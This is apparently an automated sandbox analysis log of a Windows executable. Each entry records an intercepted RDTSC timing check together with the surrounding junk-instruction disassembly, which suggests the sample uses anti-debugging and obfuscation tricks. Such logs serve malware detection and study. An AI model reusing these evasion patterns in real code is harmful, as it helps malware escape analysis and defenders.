Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10684C7 second address: 10684D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F78B909B0F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10684D1 second address: 10684D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106B535 second address: 106B539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106B539 second address: 106B55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F78B9095CF7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106B55A second address: 106B55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106B737 second address: 106B752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106E399 second address: 106E39F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106E39F second address: 106E3A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106E3A4 second address: 106E3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1074043 second address: 1074047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1074047 second address: 1074050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1074050 second address: 1074055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10742DE second address: 10742F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F78B909B0F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F78B909B0F8h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 107A4FC second address: 107A513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 je 00007F78B9095CE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 107A513 second address: 107A52A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 107A52A second address: 107A565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007F78B9095CE6h 0x00000016 jmp 00007F78B9095CF0h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 107F8AD second address: 107F8C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F78B909B0F6h 0x00000008 jp 00007F78B909B0F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 107F8C1 second address: 107F8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 107FA0C second address: 107FA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 107FE3F second address: 107FE45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10803D5 second address: 10803DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10803DB second address: 10803E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10803E0 second address: 10803F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F78B909B0FBh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jc 00007F78B909B0F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1081B5D second address: 1081B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1081B72 second address: 1081B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1081B78 second address: 1081B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1017AD7 second address: 1017ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1017ADD second address: 1017AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10856BB second address: 10856DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F78B909B0F6h 0x00000010 jmp 00007F78B909B104h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10856DF second address: 10856E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10856E3 second address: 10856F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F78B909B0F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1088BCA second address: 1088BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 100F4A7 second address: 100F4B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jnc 00007F78B909B0F6h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 100F4B7 second address: 100F4CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F78B9095CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F78B9095CE6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108F5BC second address: 108F5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108DEF5 second address: 108DF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F78B9095CF4h 0x0000000e jmp 00007F78B9095CF7h 0x00000013 pop esi 0x00000014 push eax 0x00000015 jl 00007F78B9095CE6h 0x0000001b pop eax 0x0000001c jmp 00007F78B9095CEDh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push edx 0x00000028 pop edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108E0C8 second address: 108E0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F78B909B0FFh 0x0000000a jmp 00007F78B909B105h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108E6D9 second address: 108E6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF0h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108E6F2 second address: 108E707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B101h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108E707 second address: 108E713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108E86D second address: 108E87E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B0FBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108E9D1 second address: 108E9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108EB87 second address: 108EB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F78B909B0F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108ECFA second address: 108ED03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108ED03 second address: 108ED07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108ED07 second address: 108ED27 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CE6h 0x00000008 jmp 00007F78B9095CF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 108EEB3 second address: 108EEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1035D4E second address: 1035D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1035D58 second address: 1035D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109414B second address: 109415E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEDh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104F8CA second address: 104F8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104F8CF second address: 104F8E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F78B9095CE6h 0x00000009 je 00007F78B9095CE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104F8E8 second address: 10351D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F78B909B0F8h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F78B909B0F8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+12A01DE8h], ecx 0x0000002d call dword ptr [ebp+12B835BEh] 0x00000033 jne 00007F78B909B11Ch 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e jg 00007F78B909B0F6h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104F9E9 second address: 104F9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104F9ED second address: 104FA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebx 0x00000007 and edi, 5ED055A0h 0x0000000d mov ecx, dword ptr [ebp+12A038FFh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov di, ax 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov ecx, dword ptr [ebp+12A03927h] 0x0000002a pushad 0x0000002b clc 0x0000002c jc 00007F78B909B0FBh 0x00000032 adc di, FCF7h 0x00000037 popad 0x00000038 mov dword ptr [ebp+12BB36A4h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F78B909B0F8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov cl, E9h 0x0000005a cmp dword ptr [ebp+12A038CFh], 00000000h 0x00000061 jne 00007F78B909B16Ah 0x00000067 mov dword ptr [ebp+12A032ECh], edi 0x0000006d mov byte ptr [ebp+12A01860h], 00000047h 0x00000074 add dx, D7DEh 0x00000079 mov eax, D49AA7D2h 0x0000007e cmc 0x0000007f nop 0x00000080 jnl 00007F78B909B104h 0x00000086 jmp 00007F78B909B0FEh 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e push esi 0x0000008f pushad 0x00000090 popad 0x00000091 pop esi 0x00000092 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050B91 second address: 1050B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050B98 second address: 1035D4E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F78B909B0FEh 0x0000000e nop 0x0000000f call dword ptr [ebp+12B8D1ACh] 0x00000015 pushad 0x00000016 jnc 00007F78B909B110h 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1093627 second address: 1093637 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10937C1 second address: 10937C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10937C5 second address: 10937CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10937CB second address: 10937D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10937D7 second address: 109381D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F78B9095CECh 0x0000000c jo 00007F78B9095CEEh 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F78B9095CE6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F78B9095CEBh 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jnc 00007F78B9095CF4h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1093B6D second address: 1093B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1098969 second address: 1098985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F78B9095CF2h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1098985 second address: 10989BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B106h 0x00000009 jng 00007F78B909B0F6h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F78B909B105h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1098DBF second address: 1098E0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F78B9095CE6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007F78B9095CF0h 0x00000012 jnc 00007F78B9095CE6h 0x00000018 jmp 00007F78B9095CF3h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F78B9095CF1h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10993C6 second address: 10993E0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F78B909B0F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1099547 second address: 1099569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F78B9095CE6h 0x0000000e jmp 00007F78B9095CF4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1099818 second address: 109983D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F78B909B103h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109983D second address: 1099874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F78B9095CF3h 0x0000000e jmp 00007F78B9095CF9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BF9E second address: 109BFA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BB3A second address: 109BB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BB3E second address: 109BB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCC4 second address: 109BCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCC8 second address: 109BCCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCCC second address: 109BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCD2 second address: 109BCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109F025 second address: 109F032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F78B9095CE6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109F032 second address: 109F04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B101h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109F04E second address: 109F054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109E8FD second address: 109E906 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109E906 second address: 109E90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109E90C second address: 109E916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109EBC5 second address: 109EBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109ED64 second address: 109ED7B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B909B0F6h 0x00000008 jng 00007F78B909B0F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A0954 second address: 10A095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A1FBA second address: 10A1FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
